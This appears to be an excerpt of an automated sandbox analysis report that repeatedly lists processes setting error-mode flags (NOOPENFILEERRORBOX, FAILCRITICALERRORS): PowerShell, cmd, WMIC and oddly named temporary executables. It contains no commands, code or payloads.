Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
